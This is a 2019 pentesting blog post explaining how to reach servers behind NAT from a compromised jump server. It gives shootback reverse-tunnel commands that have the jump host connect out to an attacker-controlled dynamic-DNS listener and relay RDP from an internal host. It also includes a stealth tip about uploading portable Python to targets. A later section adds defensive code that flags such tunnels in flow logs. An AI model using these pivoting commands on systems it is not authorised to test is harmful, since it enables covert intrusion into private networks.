Thursday, December 5, 2019

Pentesting servers behind NAT | Reverse RDP Windows | Reverse SSH


Good day viewers,

Today I bring another interesting scenario: pentesting servers that sit behind NAT, or Windows reverse RDP/SSH. In layman's words, connecting over RDP/SSH/TCP/UDP to Windows/Linux/xxxxx servers which are behind NAT.

In r/explainlikeimfive words:

Imagine you are auditing / pentesting a server and you have found an RCE on it. Unfortunately, the server is just a bastion / jump server, and the application servers behind it sit on a private network that is not exposed to the public network. You need a way to audit the application servers listening on that private network, or you want to connect to those servers via SSH / RDP / TCP / UDP. How do we achieve that? Yes, I know there are a number of ways to connect to these, so let me explain one way which I found was easy.

I tried many different netcat scenarios, routing ports internally, connecting via socat, etc., without any luck.
I tried to do a reverse SSH tunnel using plink, but there we have to expose our SSH username and password on the target PC, which I would never recommend in pentesting if you want to be discreet.

Finally, I found what I was looking for, "a reverse TCP tunnel which lets you access a target behind NAT or firewall": shootback.

It works fairly simply: when you cannot connect to the private network directly, it lets the private network connect back to you via the jump server.



Your Machine


Syntax

python3 master.py -m <YOUR_IP_ADDRESS>:<YOUR_LISTEN_PORT> -c <YOUR_IP_ADDRESS>:<YOUR_REDIRECTED_PORT>

Here -m is the address and port the slaver on the jump server connects back to, and -c is the local address and port your own client (RDP, SSH, etc.) connects to; whatever arrives on the -c port is forwarded through the tunnel to the target given on the slaver side.

Example
python3 master.py -m 0.0.0.0:9999 -c 0.0.0.0:7676


On JumpServer / Target Machine



Syntax

python.exe slaver.py -m <YOUR_PUBLIC_IP_OR_DYNAMIC_DNS>:<YOUR_LISTEN_PORT> -t <TARGET_APPLICATION_IP_ADDRESS>:<TARGET_APPLICATION_PORT>

The -m value must point at the address and port you gave master.py (reachable from the jump server), and -t is the application server on the private network that your connections will be delivered to.

Example
python.exe slaver.py -m thisisexample.dyndns.com:9999 -t 10.30.11.54:3389


Once you run the above command, you will see the connection being established to your listening machine.


Now we see the connection is being forwarded to port 7676, so we should be able to connect to our local IP address on port 7676. In the example, an RDP client pointed at port 7676 on our machine reaches 10.30.11.54:3389 through the tunnel.
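The same walkthrough is what a defender needs to recognize: the slaver on the jump server opens one long-lived outbound TCP session to the master, and every client connection to the master's port 7676 then appears as a connection from the jump server to 10.30.11.54:3389. The Python below is an added example, not part of the original post or the shootback project. It runs that check over a few constructed flow records: the flow-log format, the bastion address, the egress allowlist, the admin-port list and the duration threshold are all assumptions made for the illustration.

```python
"""Spot a reverse-tunnel pivot from a jump host in flow records.

Added example (not part of the original post or the shootback project).
The flow-log format, bastion address, egress allowlist and thresholds are
all assumptions made for this illustration.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Assumed flow-log format (one record per TCP session):
#   ts,src_ip,src_port,dst_ip,dst_port,proto,duration_s,bytes
# Constructed sample: 198.51.100.7 is the bastion (a documentation range
# standing in for a public address), 192.0.2.25:9999 is the external
# "master" listener, and 10.30.11.0/24 is the private application network.
SAMPLE_FLOWS = """\
1575500000,203.0.113.10,51234,198.51.100.7,443,tcp,3,18000
1575500005,198.51.100.7,49522,192.0.2.25,9999,tcp,3600,52000000
1575500010,198.51.100.7,49530,10.30.11.54,3389,tcp,3500,51000000
1575500020,198.51.100.7,49531,10.30.11.20,22,tcp,20,9000
1575507000,198.51.100.7,49600,10.30.11.54,3389,tcp,120,40000
"""

# RFC 1918 ranges are treated as the internal network. Checked explicitly
# rather than via ip_address().is_private, because the documentation ranges
# used in the sample would otherwise be classified as private too.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ADMIN_PORTS = {22, 3389, 5985, 5986}   # SSH, RDP, WinRM (assumed list)
ALLOWED_EGRESS_PORTS = {80, 443}       # assumed egress allowlist for the bastion
MIN_TUNNEL_SECONDS = 300               # assumed: a tunnel lives far longer than a web fetch


@dataclass(frozen=True)
class Flow:
    ts: int
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    duration: int
    nbytes: int

    @property
    def end(self) -> int:
        return self.ts + self.duration


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flows(text: str) -> List[Flow]:
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, sip, sp, dip, dp, proto, dur, nb = line.split(",")
        flows.append(Flow(int(ts), sip, int(sp), dip, int(dp), proto, int(dur), int(nb)))
    return flows


def find_reverse_tunnels(flows: Iterable[Flow], bastions: Set[str]) -> List[Flow]:
    """Outbound sessions a bastion opened to a non-internal host on a port
    outside the egress allowlist and held open for a long time. A jump host
    normally receives connections; it rarely dials out and stays connected."""
    return [
        f for f in flows
        if f.src_ip in bastions
        and not is_internal(f.dst_ip)
        and f.dst_port not in ALLOWED_EGRESS_PORTS
        and f.duration >= MIN_TUNNEL_SECONDS
    ]


def correlate_pivots(flows: Iterable[Flow], bastions: Set[str]) -> List[Dict]:
    """For each suspected tunnel, list the internal admin-port sessions the
    same bastion opened while the tunnel was up: that is the traffic the
    tunnel is relaying (RDP to 10.30.11.54 in the walkthrough above)."""
    flows = list(flows)
    alerts = []
    for tunnel in find_reverse_tunnels(flows, bastions):
        pivots = [
            f for f in flows
            if f.src_ip == tunnel.src_ip
            and is_internal(f.dst_ip)
            and f.dst_port in ADMIN_PORTS
            and tunnel.ts <= f.ts <= tunnel.end
        ]
        alerts.append({
            "bastion": tunnel.src_ip,
            "remote": f"{tunnel.dst_ip}:{tunnel.dst_port}",
            "tunnel_seconds": tunnel.duration,
            "internal_targets": sorted({f"{f.dst_ip}:{f.dst_port}" for f in pivots}),
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate_pivots(parse_flows(SAMPLE_FLOWS), {"198.51.100.7"}):
        print(alert)
```

The admin-port sessions are not a signal on their own, since connecting to internal SSH/RDP is exactly what a jump host is for; the signal is the long-lived outbound session from the bastion to an arbitrary Internet port, with the admin sessions inside its window as context. The mitigation this points at is egress filtering on the bastion: if the jump server cannot reach arbitrary Internet ports, the slaver never connects back to the master in the first place.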




Voila!!! Here it is: I am connected to the private network behind a load balancer / NAT via the jump server.



Tip: If the target system doesn't have Python, you can always upload a portable Python zip file and extract it; use your creativity.

Disclaimer: This is strictly for educational purposes only, please use this responsibly.

Cheers.


